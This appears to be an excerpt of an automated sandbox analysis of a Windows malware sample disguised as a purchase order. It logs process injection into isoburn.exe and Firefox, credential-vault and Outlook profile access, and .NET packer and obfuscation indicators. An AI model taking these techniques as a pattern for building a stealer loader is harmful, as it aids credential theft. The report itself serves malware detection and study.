                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"Jump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Purchase Order PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Purchase Order PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Purchase Order PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: isoburn.pdb source: Purchase Order PO.exe, 00000003.00000002.2437625544.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283390724.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: isoburn.pdbGCTL source: Purchase Order PO.exe, 00000003.00000002.2437625544.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283390724.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GDDZlGeaCapsK.exe, 00000005.00000000.2361138234.000000000024E000.00000002.00000001.01000000.0000000C.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3282670067.000000000024E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: CGFg.pdbSHA256P.K source: Purchase Order PO.exe
                      Source: Binary string: wntdll.pdbUGP source: Purchase Order PO.exe, 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2439946328.0000000004CBE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2437393096.0000000004B00000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Purchase Order PO.exe, Purchase Order PO.exe, 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2439946328.0000000004CBE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2437393096.0000000004B00000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: CGFg.pdb source: Purchase Order PO.exe

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Purchase Order PO.exe.4033880.2.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Purchase Order PO.exe.40538a0.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Purchase Order PO.exe.5a60000.7.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: Purchase Order PO.exe, frmBandaMusical.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, n51bqfhhcdaFKIjyDe.cs.Net Code: xsyCf4ViLO System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, n51bqfhhcdaFKIjyDe.cs.Net Code: xsyCf4ViLO System.Reflection.Assembly.Load(byte[])
                      Source: 6.2.isoburn.exe.554cd14.2.raw.unpack, frmBandaMusical.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 8.2.GDDZlGeaCapsK.exe.32dcd14.1.raw.unpack, frmBandaMusical.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 8.0.GDDZlGeaCapsK.exe.32dcd14.1.raw.unpack, frmBandaMusical.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 9.2.firefox.exe.2370cd14.0.raw.unpack, frmBandaMusical.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: Purchase Order PO.exeStatic PE information: 0x99AA377B [Mon Sep 11 18:22:51 2051 UTC]
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004148DC pushad ; retf 3_2_004148E4
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004032C0 push eax; ret 3_2_004032C2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00426AB3 push es; retf 3_2_00426B5B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00418ABC push ebx; ret 3_2_00418ABD
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00413BE9 push 00000025h; iretd 3_2_00413BF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00417C83 push edx; retf 3_2_00417CC2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00417D07 push edx; retf 3_2_00417CC2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00401DE9 pushad ; retf 3_2_00401E17
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00404E1D push 2A89E27Eh; ret 3_2_00404E25
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00415625 push ebp; retf 3_2_00415626
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00404F61 push ss; ret 3_2_00404F62
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F809AD push ecx; mov dword ptr [esp], ecx3_2_00F809B6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EA09AD push ecx; mov dword ptr [esp], ecx6_2_04EA09B6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE03EA push EBE9D31Fh; retf 6_2_02EE0403
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED1619 pushad ; retf 6_2_02ED1621
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED57F9 push ebx; ret 6_2_02ED57FA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE37F0 push es; retf 6_2_02EE3898
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED745E push ebx; ret 6_2_02ED745F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE0406 pushfd ; iretd 6_2_02EE0407
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED4A44 push edx; retf 6_2_02ED49FF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EC1B5A push 2A89E27Eh; ret 6_2_02EC1B62
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED7887 push cs; retf 6_2_02ED7888
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE09C9 push esp; retf 6_2_02EE09CA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED49C0 push edx; retf 6_2_02ED49FF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EDD985 push edi; iretd 6_2_02EDD987
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED0926 push 00000025h; iretd 6_2_02ED092D
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EC1C9E push ss; ret 6_2_02EC1C9F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EE3C90 push edi; iretd 6_2_02EE3DB5
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED5DB1 push ds; retf 6_2_02ED5DB4
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED5D73 push 00000035h; iretd 6_2_02ED5D7E
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_051C442C push esi; retf 6_2_051C442D
                      Source: Purchase Order PO.exeStatic PE information: section name: .text entropy: 7.0876526398275495
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, EBategwy8c2cC15txW.csHigh entropy of concatenated method names: 'AKV9Jq2H8c', 'vNW97kB345', 'GbO9gRT7Ev', 'tw190l4ukP', 'wnX9hTRAId', 'xqjgqbywav', 'KwIgXAhB0i', 'orNgM4ANFj', 'A33g1KFxqC', 'vE0gU2Eq40'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, DGsqWEGuQ5Q00quf2k.csHigh entropy of concatenated method names: 'Y0r0YXrDLF', 'PEZ0BEu0AC', 'dbV0f3xqBI', 'm8f0HA8fiF', 'eCT0xSqVvi', 'OUp05QiItx', 'KNO0oiGH8C', 'GrM0jrVbGd', 'g610iMYJwG', 'Mdx0AOhjSk'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, Akdflu7S3yU0PhL1rl.csHigh entropy of concatenated method names: 'Dispose', 'axCbUCBpIp', 'SWUnc1V1US', 'padqBJhY5r', 'FTGbRwxfaq', 'fd1bzLYBM0', 'ProcessDialogKey', 'rIon44OuJM', 'XiLnbJPITf', 'iojnn8spVa'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, s2GAxQbC5FOLC596mKr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U24ls8QZuu', 'mAAlupr1pU', 'XXnlIdqTGX', 'CihllSosti', 'ruZlvHZUPu', 'LDhlN8PeKg', 'FsLlLfxtun'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, J24B7xaH9rGxretsoX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vDfnUETHLg', 'YlbnRgRu3j', 'gKQnzRoGd6', 'HktP44x0Gp', 'vNCPbBTfmW', 'sqcPn8JXI5', 'ltSPPhxEeO', 'Xcvf1GX3mI4jnXqlbyy'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, gIYdDcSLfejPvdOIFA.csHigh entropy of concatenated method names: 'xogT8XPNGI', 's45TWAxdMl', 'ToString', 'Mx1T6O6cSs', 'x8RT7wZp06', 'nAKTaoW46f', 'DijTgmsenm', 'VSNT9OoWmB', 'n3ET0Wm8fb', 'kUVThGhfNO'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, zRrTIob4gKdRbOMC27e.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wE0u3scwTN', 'lg8u28C8If', 'k0huttIZIl', 'YPOud4GAgG', 'D1luDt7Gy6', 'IJDuQyyfoy', 'zsvuSsk8Ij'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, qiX564E2YdSINkoTYU.csHigh entropy of concatenated method names: 'N2G065hD2u', 'vYc0a3HjNv', 'aik09HYnpW', 'aok9R3yxwo', 'DnF9zTmbZc', 'Q5X046qGqk', 'a3h0bq7w1x', 'EcR0nCLNny', 'Whq0PVWOT4', 'm3w0CYL98r'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, K9RdXCipQ6pZLxJ3EB.csHigh entropy of concatenated method names: 'yI7aHw2Ete', 'EWTa5bQfjy', 'uAiajy5xFn', 'Hkraio7SxA', 'c28aO05RiI', 'aTYaV6ECMQ', 'jbKaTd5ayC', 'aGyaejU3C7', 'B6QasQJ2gB', 'nxgauVDMlH'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, L8CGi7tB1eY3QCCWsX.csHigh entropy of concatenated method names: 'zuTrjXUk03', 'hE3riyYX7O', 'isgrwaGgFJ', 'J9DrcVovcm', 'El9rZtHNJo', 'hlbrk7tUK9', 'fWhrEjO4vW', 'hi2rKTcOQ6', 'rf6ryDGst7', 'ogpr3PYoUr'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, JbtMeTQ10SnggKWYjw.csHigh entropy of concatenated method names: 'ToString', 'BFUV30o4RA', 'jl9Vc5EK1i', 'QWgVpCk93a', 'pviVZdEfvJ', 'tNCVkOORQm', 'YlVVmGcmsB', 'JtpVEp1kps', 'kelVKWwtEY', 'o6qVGC0L6Z'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, FXxphrzNwF0yiXy7jg.csHigh entropy of concatenated method names: 'cgwu5k0Xet', 'kAgujcDar4', 'MhGuiD5ykA', 'vLFuwVAbQl', 'nMfuc62Wn4', 'W3SuZecVlE', 'dfDuksvx0E', 'AJtuLRIGxg', 'FWauY3d53S', 'F8UuBJqqQF'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, DAZwDpMM74xCCBpIpA.csHigh entropy of concatenated method names: 'Du5sOk8IB5', 'DXrsTBynPX', 'QPNssHD5Lm', 'j1RsId5RC8', 'HdusvYTj8H', 'WFXsLKxgj9', 'Dispose', 'tLZe64sxQ6', 'G1Se7lH7kY', 'YRQeayqgFn'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, H4mytSCIrnGbZ3oik4.csHigh entropy of concatenated method names: 'zHcb0VaY5f', 'j5obhNEYQ5', 'epQb86pZLx', 'e3EbWBPNrT', 'Ln6bOttjBa', 'QegbVy8c2c', 'hvGFr9DpIohGt3BIpv', 'UF6ddIs5hydPj8sEwL', 'pjEleQRmSHTK3na5Dx', 'acubbhjtQj'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, D4OuJMU1iLJPITf9oj.csHigh entropy of concatenated method names: 'diUswcFhel', 'EMBscJ0Vkb', 'rPBspExshR', 'Ir6sZX8SOI', 'aZDskro1Kj', 'v79sm1UvkI', 'gJksEQvjoS', 'IT6sKUhAI4', 'mvisG4IXis', 'TvssyN9mBs'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, n51bqfhhcdaFKIjyDe.csHigh entropy of concatenated method names: 'jX9PJk5eRN', 'YdfP6MBjvl', 'z9BP7TG5f1', 'BPoPajn5Nf', 'h2qPgm15BG', 'Wp8P9ymbWA', 'OLBP0fH4CX', 'K4QPhxhrpD', 'j2xPFM7LQH', 'rpxP8QhCey'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, mspVaMRVfasIrgTCCJ.csHigh entropy of concatenated method names: 'C19uaDIciZ', 'VVQug4GhoW', 'p0Vu9nJY0Q', 'BTtu0kSF0L', 'HlausCv5RQ', 'F4Tuh5WHhT', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, Qq9mFUXDUKZxa3t4LW.csHigh entropy of concatenated method names: 'ei5T1NShIE', 'fBlTR6IRpE', 'BCFe4j2bdl', 'QkXebENW91', 'YJCT3CUCIJ', 'vkTT2so0VB', 'iAoTtwZDu2', 'nLUTdXsbqL', 'yoYTDxZ05c', 'eWuTQj9hgT'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, HVaY5fj05oNEYQ5bkR.csHigh entropy of concatenated method names: 'g8t7dL7VGL', 'Mrx7DWexLS', 'Uv17QoengP', 'TmT7SUAfh8', 'VnE7qUSQn6', 'YFu7X0LiDg', 'vEl7MJbeQm', 'wS271ua6bN', 'NhW7UNVJ94', 'nPG7RYGnL8'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, GriiCsnN2mKnYudkrE.csHigh entropy of concatenated method names: 'RCrfnbsZu', 'h4oHiXR0C', 'Nso5sOrGS', 'l6ZoIlQRI', 'DV4i4Al83', 'wuKA1kxEb', 'KZ6PB6yh6ydqYjvXk9', 'ty4bNqCEhWDAuoHln5', 'wQHeMHnRp', 'A9IugkvpE'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, TKI3ACdCVd5R3xuR1O.csHigh entropy of concatenated method names: 'u5aOyICt1q', 'e1AO2pqUEW', 'GB7OdVc6uT', 'qEIODn4m3e', 'UKkOc6ToEF', 'FOTOp7hNlA', 'o59OZH4E79', 'nNVOk2Nh2m', 'cnyOmrPeJd', 'AV5OEEF25k'
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, CXQiw3bb50nvFL58ii4.csHigh entropy of concatenated method names: 'lj5uRDxkCR', 'R40uzZ2ZMm', 'b8GI4E7P9S', 'j8aIbB6Jsj', 'VFdInX6yry', 'iTvIPSiJTE', 'rnkICf4qT4', 'W63IJyVreh', 'owDI6bQZRx', 'SiMI79lEng'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, EBategwy8c2cC15txW.csHigh entropy of concatenated method names: 'AKV9Jq2H8c', 'vNW97kB345', 'GbO9gRT7Ev', 'tw190l4ukP', 'wnX9hTRAId', 'xqjgqbywav', 'KwIgXAhB0i', 'orNgM4ANFj', 'A33g1KFxqC', 'vE0gU2Eq40'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, DGsqWEGuQ5Q00quf2k.csHigh entropy of concatenated method names: 'Y0r0YXrDLF', 'PEZ0BEu0AC', 'dbV0f3xqBI', 'm8f0HA8fiF', 'eCT0xSqVvi', 'OUp05QiItx', 'KNO0oiGH8C', 'GrM0jrVbGd', 'g610iMYJwG', 'Mdx0AOhjSk'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, Akdflu7S3yU0PhL1rl.csHigh entropy of concatenated method names: 'Dispose', 'axCbUCBpIp', 'SWUnc1V1US', 'padqBJhY5r', 'FTGbRwxfaq', 'fd1bzLYBM0', 'ProcessDialogKey', 'rIon44OuJM', 'XiLnbJPITf', 'iojnn8spVa'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, s2GAxQbC5FOLC596mKr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U24ls8QZuu', 'mAAlupr1pU', 'XXnlIdqTGX', 'CihllSosti', 'ruZlvHZUPu', 'LDhlN8PeKg', 'FsLlLfxtun'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, J24B7xaH9rGxretsoX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vDfnUETHLg', 'YlbnRgRu3j', 'gKQnzRoGd6', 'HktP44x0Gp', 'vNCPbBTfmW', 'sqcPn8JXI5', 'ltSPPhxEeO', 'Xcvf1GX3mI4jnXqlbyy'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, gIYdDcSLfejPvdOIFA.csHigh entropy of concatenated method names: 'xogT8XPNGI', 's45TWAxdMl', 'ToString', 'Mx1T6O6cSs', 'x8RT7wZp06', 'nAKTaoW46f', 'DijTgmsenm', 'VSNT9OoWmB', 'n3ET0Wm8fb', 'kUVThGhfNO'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, zRrTIob4gKdRbOMC27e.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wE0u3scwTN', 'lg8u28C8If', 'k0huttIZIl', 'YPOud4GAgG', 'D1luDt7Gy6', 'IJDuQyyfoy', 'zsvuSsk8Ij'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, qiX564E2YdSINkoTYU.csHigh entropy of concatenated method names: 'N2G065hD2u', 'vYc0a3HjNv', 'aik09HYnpW', 'aok9R3yxwo', 'DnF9zTmbZc', 'Q5X046qGqk', 'a3h0bq7w1x', 'EcR0nCLNny', 'Whq0PVWOT4', 'm3w0CYL98r'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, K9RdXCipQ6pZLxJ3EB.csHigh entropy of concatenated method names: 'yI7aHw2Ete', 'EWTa5bQfjy', 'uAiajy5xFn', 'Hkraio7SxA', 'c28aO05RiI', 'aTYaV6ECMQ', 'jbKaTd5ayC', 'aGyaejU3C7', 'B6QasQJ2gB', 'nxgauVDMlH'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, L8CGi7tB1eY3QCCWsX.csHigh entropy of concatenated method names: 'zuTrjXUk03', 'hE3riyYX7O', 'isgrwaGgFJ', 'J9DrcVovcm', 'El9rZtHNJo', 'hlbrk7tUK9', 'fWhrEjO4vW', 'hi2rKTcOQ6', 'rf6ryDGst7', 'ogpr3PYoUr'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, JbtMeTQ10SnggKWYjw.csHigh entropy of concatenated method names: 'ToString', 'BFUV30o4RA', 'jl9Vc5EK1i', 'QWgVpCk93a', 'pviVZdEfvJ', 'tNCVkOORQm', 'YlVVmGcmsB', 'JtpVEp1kps', 'kelVKWwtEY', 'o6qVGC0L6Z'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, FXxphrzNwF0yiXy7jg.csHigh entropy of concatenated method names: 'cgwu5k0Xet', 'kAgujcDar4', 'MhGuiD5ykA', 'vLFuwVAbQl', 'nMfuc62Wn4', 'W3SuZecVlE', 'dfDuksvx0E', 'AJtuLRIGxg', 'FWauY3d53S', 'F8UuBJqqQF'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, DAZwDpMM74xCCBpIpA.csHigh entropy of concatenated method names: 'Du5sOk8IB5', 'DXrsTBynPX', 'QPNssHD5Lm', 'j1RsId5RC8', 'HdusvYTj8H', 'WFXsLKxgj9', 'Dispose', 'tLZe64sxQ6', 'G1Se7lH7kY', 'YRQeayqgFn'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, H4mytSCIrnGbZ3oik4.csHigh entropy of concatenated method names: 'zHcb0VaY5f', 'j5obhNEYQ5', 'epQb86pZLx', 'e3EbWBPNrT', 'Ln6bOttjBa', 'QegbVy8c2c', 'hvGFr9DpIohGt3BIpv', 'UF6ddIs5hydPj8sEwL', 'pjEleQRmSHTK3na5Dx', 'acubbhjtQj'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, D4OuJMU1iLJPITf9oj.csHigh entropy of concatenated method names: 'diUswcFhel', 'EMBscJ0Vkb', 'rPBspExshR', 'Ir6sZX8SOI', 'aZDskro1Kj', 'v79sm1UvkI', 'gJksEQvjoS', 'IT6sKUhAI4', 'mvisG4IXis', 'TvssyN9mBs'
